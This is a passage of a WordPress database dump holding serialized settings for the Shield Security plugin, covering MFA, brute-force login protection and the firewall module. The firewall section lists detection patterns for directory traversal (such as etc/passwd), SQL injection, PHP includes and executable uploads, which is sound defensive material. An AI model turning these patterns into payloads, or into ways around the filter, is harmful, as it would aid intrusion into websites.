enabled, all multi-factor authentication methods will be applied to a user login. Disable to only require one to pass.\";}i:3;a:11:{s:3:\"key\";s:8:\"mfa_skip\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";i:0;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:18:\"https://icwp.io/b1\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Multi-Factor By-Pass\";s:7:\"summary\";s:79:\"A User Can By-Pass Multi-Factor Authentication (MFA) For The Set Number Of Days\";s:11:\"description\";s:98:\"Enter the number of days a user can by-pass future MFA after a successful MFA-login. 0 to disable.\";}i:4;a:10:{s:3:\"key\";s:17:\"allow_backupcodes\";s:7:\"section\";s:34:\"section_multifactor_authentication\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/dx\";s:9:\"link_blog\";s:18:\"https://icwp.io/dy\";s:4:\"name\";s:18:\"Allow Backup Codes\";s:7:\"summary\";s:37:\"Allow Users To Generate A Backup Code\";s:11:\"description\";s:95:\"Allow users to generate a backup code that can be used to login if MFA factors are unavailable.\";}i:5;a:9:{s:3:\"key\";s:27:\"enable_google_authenticator\";s:7:\"section\";s:14:\"section_2fa_ga\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:21:\"https://icwp.io/shld7\";s:9:\"link_blog\";s:21:\"https://icwp.io/shld6\";s:4:\"name\";s:27:\"Enable Google Authenticator\";s:7:\"summary\";s:39:\"Allow Users To Use Google Authenticator\";s:11:\"description\";s:101:\"When enabled, users will have the option to add Google Authenticator to their WordPress user profile.\";}i:6;a:9:{s:3:\"key\";s:27:\"enable_email_authentication\";s:7:\"section\";s:17:\"section_2fa_email\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/3t\";s:9:\"link_blog\";s:18:\"https://icwp.io/9q\";s:4:\"name\";s:27:\"Enable Email Authentication\";s:7:\"summary\";s:40:\"Two-Factor Login Authentication By Email\";s:11:\"description\";s:90:\"All users will be required to verify their login by email-based two-factor authentication.\";}i:7;a:10:{s:3:\"key\";s:26:\"two_factor_auth_user_roles\";s:7:\"section\";s:17:\"section_2fa_email\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:4:{i:0;s:11:\"contributor\";i:1;s:6:\"author\";i:2;s:6:\"editor\";i:3;s:13:\"administrator\";}s:13:\"value_options\";a:10:{i:0;a:2:{s:9:\"value_key\";s:10:\"subscriber\";s:4:\"text\";s:11:\"Subscribers\";}i:1;a:2:{s:9:\"value_key\";s:11:\"contributor\";s:4:\"text\";s:12:\"Contributors\";}i:2;a:2:{s:9:\"value_key\";s:6:\"author\";s:4:\"text\";s:7:\"Authors\";}i:3;a:2:{s:9:\"value_key\";s:6:\"editor\";s:4:\"text\";s:7:\"Editors\";}i:4;a:2:{s:9:\"value_key\";s:13:\"administrator\";s:4:\"text\";s:14:\"Administrators\";}i:5;a:2:{s:9:\"value_key\";s:8:\"customer\";s:4:\"text\";s:14:\"[Woo] Customer\";}i:6;a:2:{s:9:\"value_key\";s:12:\"shop_manager\";s:4:\"text\";s:22:\"[Woo/EDD] Shop Manager\";}i:7;a:2:{s:9:\"value_key\";s:15:\"shop_accountant\";s:4:\"text\";s:21:\"[EDD] Shop Accountant\";}i:8;a:2:{s:9:\"value_key\";s:11:\"shop_worker\";s:4:\"text\";s:17:\"[EDD] Shop Worker\";}i:9;a:2:{s:9:\"value_key\";s:14:\"edd_subscriber\";s:4:\"text\";s:14:\"[EDD] Customer\";}}s:9:\"link_info\";s:18:\"https://icwp.io/4v\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:30:\"Enforce - Email Authentication\";s:7:\"summary\";s:46:\"All User Roles Subject To Email Authentication\";s:11:\"description\";s:130:\"Enforces email-based authentication on all users with the selected roles. Note: This setting only applies to email authentication.\";}i:8;a:10:{s:3:\"key\";s:24:\"bot_protection_locations\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:1:{i:0;s:5:\"login\";}s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:5:\"login\";s:4:\"text\";s:5:\"Login\";}i:1;a:2:{s:9:\"value_key\";s:8:\"register\";s:4:\"text\";s:8:\"Register\";}i:2;a:2:{s:9:\"value_key\";s:8:\"password\";s:4:\"text\";s:13:\"Lost Password\";}i:3;a:2:{s:9:\"value_key\";s:12:\"checkout_woo\";s:4:\"text\";s:22:\"Checkout (WooCommerce)\";}}s:9:\"link_info\";s:18:\"https://icwp.io/dv\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Protection Locations\";s:7:\"summary\";s:38:\"How Google reCAPTCHA Will Be Displayed\";s:11:\"description\";s:64:\"Choose for which forms bot protection measures will be deployed.\";}i:9;a:10:{s:3:\"key\";s:20:\"login_limit_interval\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:2:\"10\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:18:\"https://icwp.io/3q\";s:9:\"link_blog\";s:18:\"https://icwp.io/9o\";s:4:\"name\";s:23:\"Login Cooldown Interval\";s:7:\"summary\";s:39:\"Limit login attempts to every X seconds\";s:11:\"description\";s:109:\"WordPress will process only ONE login attempt for every number of seconds specified. Zero (0) turns this off.\";}i:10;a:9:{s:3:\"key\";s:23:\"enable_login_gasp_check\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/3r\";s:9:\"link_blog\";s:18:\"https://icwp.io/9n\";s:4:\"name\";s:14:\"Bot Protection\";s:7:\"summary\";s:54:\"Protect WP Login From Automated Login Attempts By Bots\";s:11:\"description\";s:138:\"Adds a dynamically (Javascript) generated checkbox to the login form that prevents bots using automated login techniques. Recommended: ON.\";}i:11;a:10:{s:3:\"key\";s:29:\"enable_google_recaptcha_login\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"default\";s:4:\"text\";s:13:\"Default Style\";}i:2;a:2:{s:9:\"value_key\";s:5:\"light\";s:4:\"text\";s:11:\"Light Theme\";}i:3;a:2:{s:9:\"value_key\";s:4:\"dark\";s:4:\"text\";s:10:\"Dark Theme\";}i:4;a:2:{s:9:\"value_key\";s:9:\"invisible\";s:4:\"text\";s:9:\"Invisible\";}}s:9:\"link_info\";s:18:\"https://icwp.io/9m\";s:9:\"link_blog\";s:21:\"https://icwp.io/shld5\";s:4:\"name\";s:16:\"Google reCAPTCHA\";s:7:\"summary\";s:23:\"Enable Google reCAPTCHA\";s:11:\"description\";s:41:\"Use Google reCAPTCHA on the login screen.\";}i:12;a:10:{s:3:\"key\";s:17:\"enable_antibot_js\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/dw\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:10:\"AntiBot JS\";s:7:\"summary\";s:42:\"Load Anti-Bot JS For 3rd Party Login Forms\";s:11:\"description\";s:79:\"Important: This is experimental. Please contact support for further assistance.\";}i:13;a:9:{s:3:\"key\";s:16:\"antibot_form_ids\";s:7:\"section\";s:36:\"section_brute_force_login_protection\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:2:{i:0;s:19:\"form#ihc_login_form\";i:1;s:15:\"form#createuser\";}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:13:\"AntiBot Forms\";s:7:\"summary\";s:66:\"Enter The IDs Of The 3rd Party Login Forms For Use With AntiBot JS\";s:11:\"description\";s:32:\"For Use With AnitBot JS (above).\";}i:14;a:9:{s:3:\"key\";s:14:\"enable_yubikey\";s:7:\"section\";s:30:\"section_yubikey_authentication\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/4f\";s:9:\"link_blog\";s:18:\"https://icwp.io/9t\";s:4:\"name\";s:29:\"Enable Yubikey Authentication\";s:7:\"summary\";s:49:\"Turn On / Off Yubikey Authentication On This Site\";s:11:\"description\";s:99:\"Combined with your Yubikey API Key (below) this will form the basis of your Yubikey Authentication.\";}i:15;a:10:{s:3:\"key\";s:14:\"yubikey_app_id\";s:7:\"section\";s:30:\"section_yubikey_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/4g\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Yubikey App ID\";s:7:\"summary\";s:26:\"Your Unique Yubikey App ID\";s:11:\"description\";s:91:\"Combined with your Yubikey API Key this will form the basis of your Yubikey Authentication.\";}i:16;a:10:{s:3:\"key\";s:15:\"yubikey_api_key\";s:7:\"section\";s:30:\"section_yubikey_authentication\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/4g\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Yubikey API Key\";s:7:\"summary\";s:31:\"Your Unique Yubikey App API Key\";s:11:\"description\";s:90:\"Combined with your Yubikey App ID this will form the basis of your Yubikey Authentication.\";}i:17;a:11:{s:3:\"key\";s:13:\"text_imahuman\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"GASP Checkbox Text\";s:7:\"summary\";s:47:\"The Message Displayed Next To The GASP Checkbox\";s:11:\"description\";s:99:\"You can change the text displayed to the user beside the checkbox if you need a customized message.\";}i:18;a:11:{s:3:\"key\";s:19:\"text_pleasecheckbox\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:18:\"https://icwp.io/dz\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"GASP Alert Text\";s:7:\"summary\";s:55:\"The Message Displayed If The User Doesn\'t Check The Box\";s:11:\"description\";s:95:\"You can change the text displayed to the user in the alert message if they don\'t check the box.\";}i:19;a:5:{s:3:\"key\";s:26:\"email_can_send_verified_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:-1;}i:20;a:6:{s:3:\"key\";s:8:\"gasp_key\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:21;a:6:{s:3:\"key\";s:21:\"two_factor_secret_key\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:22;a:5:{s:3:\"key\";s:21:\"use_login_intent_page\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"boolean\";s:5:\"value\";b:1;}}s:11:\"definitions\";a:2:{s:20:\"login_intent_timeout\";i:5;s:6:\"events\";a:16:{s:23:\"2fa_backupcode_verified\";a:0:{}s:19:\"2fa_backupcode_fail\";a:1:{s:7:\"offense\";b:1;}s:18:\"2fa_email_verified\";a:0:{}s:21:\"2fa_email_verify_fail\";a:1:{s:7:\"offense\";b:1;}s:23:\"2fa_googleauth_verified\";a:0:{}s:15:\"2fa_google_fail\";a:1:{s:7:\"offense\";b:1;}s:20:\"2fa_yubikey_verified\";a:0:{}s:16:\"2fa_yubikey_fail\";a:1:{s:7:\"offense\";b:1;}s:22:\"2fa_email_send_success\";a:0:{}s:19:\"2fa_email_send_fail\";a:0:{}s:13:\"cooldown_fail\";a:0:{}s:13:\"honeypot_fail\";a:0:{}s:11:\"botbox_fail\";a:0:{}s:11:\"login_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:14:\"hide_login_url\";a:1:{s:5:\"audit\";b:0;}s:11:\"2fa_success\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}}}s:10:\"meta_modts\";i:1572181749;}'),(33630,1,'shield_mod_config_56a94c387acf8d4fd9226ad83dc58c4f','a:6:{s:4:\"slug\";s:8:\"firewall\";s:10:\"properties\";a:13:{s:4:\"slug\";s:8:\"firewall\";s:4:\"name\";s:8:\"Firewall\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"firewall\";s:7:\"tagline\";s:61:\"Automatically block malicious URLs and data sent to your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:30;}s:8:\"sections\";a:6:{i:0;a:5:{s:4:\"slug\";s:33:\"section_firewall_blocking_options\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"Firewall Blocking Options\";s:11:\"title_short\";s:17:\"Firewall Blocking\";s:7:\"summary\";a:2:{i:0;s:56:\"Here you choose what kind of malicious data to scan for.\";i:1;s:198:\"Recommendation - Turn on as many options here as you can. If you find an incompatibility or something stops working, un-check 1 option at a time until you find the problem or review the Audit Trail.\";}}i:1;a:4:{s:4:\"slug\";s:38:\"section_choose_firewall_block_response\";s:5:\"title\";s:30:\"Choose Firewall Block Response\";s:11:\"title_short\";s:17:\"Firewall Response\";s:7:\"summary\";a:2:{i:0;s:75:\"Here you choose how the plugin will respond when it detects malicious data.\";i:1;s:54:\"Recommendation - Choose the option \'Die With Message\'.\";}}i:2;a:4:{s:4:\"slug\";s:17:\"section_whitelist\";s:5:\"title\";s:72:\"Whitelists - IPs, Pages, Parameters, and Users that by-pass the Firewall\";s:11:\"title_short\";s:9:\"Whitelist\";s:7:\"summary\";a:2:{i:0;s:124:\"In principle you should not need to whitelist anything or anyone unless you have discovered a collision with another plugin.\";i:1;s:90:\"Recommendation - Do not whitelist anything unless you are confident in what you are doing.\";}}i:3;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:4;a:4:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:5:\"title\";s:23:\"Enable Module: Firewall\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:123:\"Purpose - The Firewall is designed to analyse data sent to your website and block any requests that appear to be malicious.\";i:1;s:53:\"Recommendation - Keep the Firewall feature turned on.\";}}i:5;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:15:{i:0;a:9:{s:3:\"key\";s:15:\"enable_firewall\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_firewall\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/43\";s:9:\"link_blog\";s:22:\"https://icwp.io/wpsf01\";s:4:\"name\";s:15:\"Enable Firewall\";s:7:\"summary\";s:39:\"Enable (or Disable) The Firewall module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Firewall module\";}i:1;a:9:{s:3:\"key\";s:21:\"include_cookie_checks\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Include Cookies\";s:7:\"summary\";s:41:\"Also Test Cookie Values In Firewall Tests\";s:11:\"description\";s:95:\"The firewall tests GET and POST, but with this option checked it will also check COOKIE values.\";}i:2;a:9:{s:3:\"key\";s:19:\"block_dir_traversal\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Directory Traversals\";s:7:\"summary\";s:26:\"Block Directory Traversals\";s:11:\"description\";s:71:\"This will block directory traversal paths in in application parameters.\";}i:3;a:9:{s:3:\"key\";s:17:\"block_sql_queries\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"SQL Queries\";s:7:\"summary\";s:17:\"Block SQL Queries\";s:11:\"description\";s:46:\"This will block SQL in application parameters.\";}i:4;a:9:{s:3:\"key\";s:21:\"block_wordpress_terms\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"WordPress Terms\";s:7:\"summary\";s:30:\"Block WordPress Specific Terms\";s:11:\"description\";s:91:\"This will block WordPress specific terms in application parameters (wp_, user_login, etc.).\";}i:5;a:9:{s:3:\"key\";s:22:\"block_field_truncation\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Field Truncation\";s:7:\"summary\";s:30:\"Block Field Truncation Attacks\";s:11:\"description\";s:66:\"This will block field truncation attacks in application parameters\";}i:6;a:9:{s:3:\"key\";s:14:\"block_php_code\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:8:\"PHP Code\";s:7:\"summary\";s:23:\"Block PHP Code Includes\";s:11:\"description\";s:132:\"This will block any data that appears to try and include PHP files. Will probably block saving within the Plugin/Theme file editors.\";}i:7;a:9:{s:3:\"key\";s:22:\"block_exe_file_uploads\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Exe File Uploads\";s:7:\"summary\";s:29:\"Block Executable File Uploads\";s:11:\"description\";s:59:\"This will block executable file uploads (.php, .exe, etc.).\";}i:8;a:9:{s:3:\"key\";s:20:\"block_leading_schema\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Leading Schemas\";s:7:\"summary\";s:36:\"Block Leading Schemas (HTTPS / HTTP)\";s:11:\"description\";s:135:\"This will block leading schemas http:// and https:// in application parameters (off by default; may cause problems with other plugins).\";}i:9;a:9:{s:3:\"key\";s:16:\"block_aggressive\";s:7:\"section\";s:33:\"section_firewall_blocking_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Aggressive Scan\";s:7:\"summary\";s:23:\"Aggressively Block Data\";s:11:\"description\";s:159:\"Employs a set of aggressive rules to detect and block malicious data submitted to your site. Warning - May cause an increase in false-positive firewall blocks.\";}i:10;a:10:{s:3:\"key\";s:14:\"block_response\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:7:\"default\";s:20:\"redirect_die_message\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:4:{i:0;a:2:{s:9:\"value_key\";s:20:\"redirect_die_message\";s:4:\"text\";s:16:\"Die With Message\";}i:1;a:2:{s:9:\"value_key\";s:12:\"redirect_die\";s:4:\"text\";s:3:\"Die\";}i:2;a:2:{s:9:\"value_key\";s:13:\"redirect_home\";s:4:\"text\";s:21:\"Redirect To Home Page\";}i:3;a:2:{s:9:\"value_key\";s:12:\"redirect_404\";s:4:\"text\";s:10:\"Return 404\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Block Response\";s:7:\"summary\";s:50:\"How the firewall responds when it blocks a request\";s:11:\"description\";s:100:\"We recommend dying with a message so you know what might have occurred when the firewall blocks you.\";}i:11;a:9:{s:3:\"key\";s:16:\"block_send_email\";s:7:\"section\";s:38:\"section_choose_firewall_block_response\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Email Report\";s:7:\"summary\";s:89:\"When a visitor is blocked the firewall will send an email to the configured email address\";s:11:\"description\";s:124:\"Use with caution - if you get hit by automated bots you may send out too many emails and you could get blocked by your host.\";}i:12;a:9:{s:3:\"key\";s:21:\"page_params_whitelist\";s:7:\"section\";s:17:\"section_whitelist\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:21:\"comma_separated_lists\";s:9:\"link_info\";s:18:\"https://icwp.io/2a\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Whitelist Parameters\";s:7:\"summary\";s:74:\"Detail pages and parameters that are whitelisted (ignored by the firewall)\";s:11:\"description\";s:104:\"This should be used with caution and you should only provide parameter names that you must have excluded\";}i:13;a:9:{s:3:\"key\";s:16:\"whitelist_admins\";s:7:\"section\";s:17:\"section_whitelist\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:21:\"Ignore Administrators\";s:7:\"summary\";s:21:\"Ignore Administrators\";s:11:\"description\";s:78:\"Authenticated administrator users will not be processed by the firewall rules.\";}i:14;a:11:{s:3:\"key\";s:16:\"text_firewalldie\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Firewall Block Message\";s:7:\"summary\";s:63:\"Message Displayed To Visitor When A Firewall Block Is Triggered\";s:11:\"description\";s:102:\"When you select the option to display a message to the visitor, this is the message that is displayed.\";}}s:11:\"definitions\";a:3:{s:17:\"default_whitelist\";a:14:{s:29:\"/wp-admin/options-general.php\";a:0:{}s:21:\"/wp-admin/options.php\";a:2:{i:0;s:4:\"home\";i:1;s:7:\"siteurl\";}s:21:\"/wp-admin/plugins.php\";a:1:{i:0;s:6:\"plugin\";}s:22:\"/wp-admin/post-new.php\";a:0:{}s:22:\"/wp-admin/page-new.php\";a:0:{}s:22:\"/wp-admin/link-add.php\";a:0:{}s:26:\"/wp-admin/media-upload.php\";a:0:{}s:19:\"/wp-admin/admin.php\";a:1:{i:0;s:4:\"page\";}s:18:\"/wp-admin/post.php\";a:1:{i:0;s:7:\"content\";}s:27:\"/wp-admin/plugin-editor.php\";a:1:{i:0;s:10:\"newcontent\";}s:18:\"/wp-admin/page.php\";a:0:{}s:24:\"/wp-admin/admin-ajax.php\";a:0:{}s:21:\"/wp-comments-post.php\";a:2:{i:0;s:3:\"url\";i:1;s:7:\"comment\";}s:1:\"*\";a:20:{i:0;s:7:\"ajaxurl\";i:1;s:20:\"g-recaptcha-response\";i:2;s:11:\"verify_sign\";i:3;s:6:\"txn_id\";i:4;s:15:\"wp_http_referer\";i:5;s:16:\"_wp_http_referer\";i:6;s:25:\"_wp_original_http_referer\";i:7;s:11:\"JCS_INENREF\";i:8;s:5:\"pass1\";i:9;s:10:\"pass1-text\";i:10;s:3:\"pwd\";i:11;s:3:\"url\";i:12;s:10:\"referredby\";i:13;s:11:\"redirect_to\";i:14;s:28:\"jetpack_sso_original_request\";i:15;s:23:\"jetpack_sso_redirect_to\";i:16;s:33:\"/^wordpress_logged_in_[0-9a-f]+$/\";i:17;s:10:\"edd_action\";i:18;s:12:\"edd_redirect\";i:19;s:10:\"wpcf7-form\";}}s:17:\"firewall_patterns\";a:8:{s:12:\"dirtraversal\";a:1:{s:6:\"simple\";a:8:{i:0;s:10:\"etc/passwd\";i:1;s:17:\"proc/self/environ\";i:2;s:10:\"etc/passwd\";i:3;s:8:\"makefile\";i:4;s:7:\"wwwroot\";i:5;s:10:\"pingserver\";i:6;s:3:\"../\";i:7;s:8:\"loopback\";}}s:7:\"wpterms\";a:2:{s:6:\"simple\";a:2:{i:0;s:4:\"/**/\";i:1;s:13:\"wp-config.php\";}s:5:\"regex\";a:3:{i:0;s:4:\"^wp_\";i:1;s:11:\"^user_login\";i:2;s:10:\"^user_pass\";}}s:15:\"fieldtruncation\";a:1:{s:5:\"regex\";a:2:{i:0;s:7:\"\\s{49,}\";i:1;s:4:\"\\x00\";}}s:10:\"sqlqueries\";a:1:{s:5:\"regex\";a:3:{i:0;s:11:\"concat\\s*\\(\";i:1;s:12:\"group_concat\";i:2;s:13:\"union.*select\";}}s:7:\"exefile\";a:1:{s:5:\"regex\";a:1:{i:0;s:86:\"\\.(dll|rb|py|exe|php[3-6]?|pl|perl|ph[34]|phl|phtml|phtm|sql|ini|jsp|asp|git|svn|tar)$\";}}s:6:\"schema\";a:2:{s:6:\"simple\";a:1:{i:0;s:6:\".shtml\";}s:5:\"regex\";a:1:{i:0;s:23:\"^(http|https|ftp|file):\";}}s:7:\"phpcode\";a:2:{s:6:\"simple\";N;s:5:\"regex\";a:1:{i:0;s:52:\"(include|include_once|require|require_once)\\s*\\(.*\\)\";}}s:10:\"aggressive\";a:2:{s:6:\"simple\";a:11:{i:0;s:5:\"eval(\";i:1;s:6:\"(null)\";i:2;s:7:\"base64_\";i:3;s:9:\"localhost\";i:4;s:10:\"(function(\";i:5;s:8:\"{x.html(\";i:6;s:7:\").html(\";i:7;s:3:\"...\";i:8;s:10:\"/httpdocs/\";i:9;s:5:\"/tmp/\";i:10;s:8:\"boot.ini\";}s:5:\"regex\";a:5:{i:0;s:16:\"GLOBALS(=|\\[|%%)\";i:1;s:16:\"REQUEST(=|\\[|%%)\";i:2;s:24:\"(`|\\<|\\>|\\[|\\]|\\{|\\}|\\?)\";i:3;s:32:\"drop\\s+table\\s+(`|\'?)[a-z0-9]+\\1\";i:4;s:53:\"\'\\s+OR\\s+\'([a-z0-9]+)\'\\s*=\\s*\'\\1\'\\s+(--|\\(\\{|\\/\\*)\\s+\";}}}s:6:\"events\";a:12:{s:10:\"check_skip\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:14:\"firewall_block\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}s:23:\"blockparam_dirtraversal\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_wpterms\";a:1:{s:3:\"cat\";i:3;}s:26:\"blockparam_fieldtruncation\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_sqlqueries\";a:1:{s:3:\"cat\";i:3;}s:17:\"blockparam_schema\";a:1:{s:3:\"cat\";i:3;}s:21:\"blockparam_aggressive\";a:1:{s:3:\"cat\";i:3;}s:18:\"blockparam_phpcode\";a:1:{s:3:\"cat\";i:3;}s:13:\"block_exefile\";a:1:{s:3:\"cat\";i:3;}s:13:\"fw_email_fail\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}s:16:\"fw_email_success\";a:1:{s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1572181749;}'),(33631,1,'shield_mod_config_aa429c6faefe807a74474b2ba177fc76','a:6:{s:4:\"slug\";s:15:\"user_management\";s:10:\"properties\";a:12:{s:4:\"name\";s:15:\"User Management\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:15:\"user_management\";s:7:\"tagline\";s:61:\"Control user sessions, duration, timeouts and account sharing\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:40;}s:8:\"sections\";a:6:{i:0;a:5:{s:4:\"slug\";s:31:\"section_user_session_management\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"User Session Management\";s:11:\"title_short\";s:15:\"Session Options\";s:7:\"summary\";a:2:{i:0;s:119:\"Purpose - 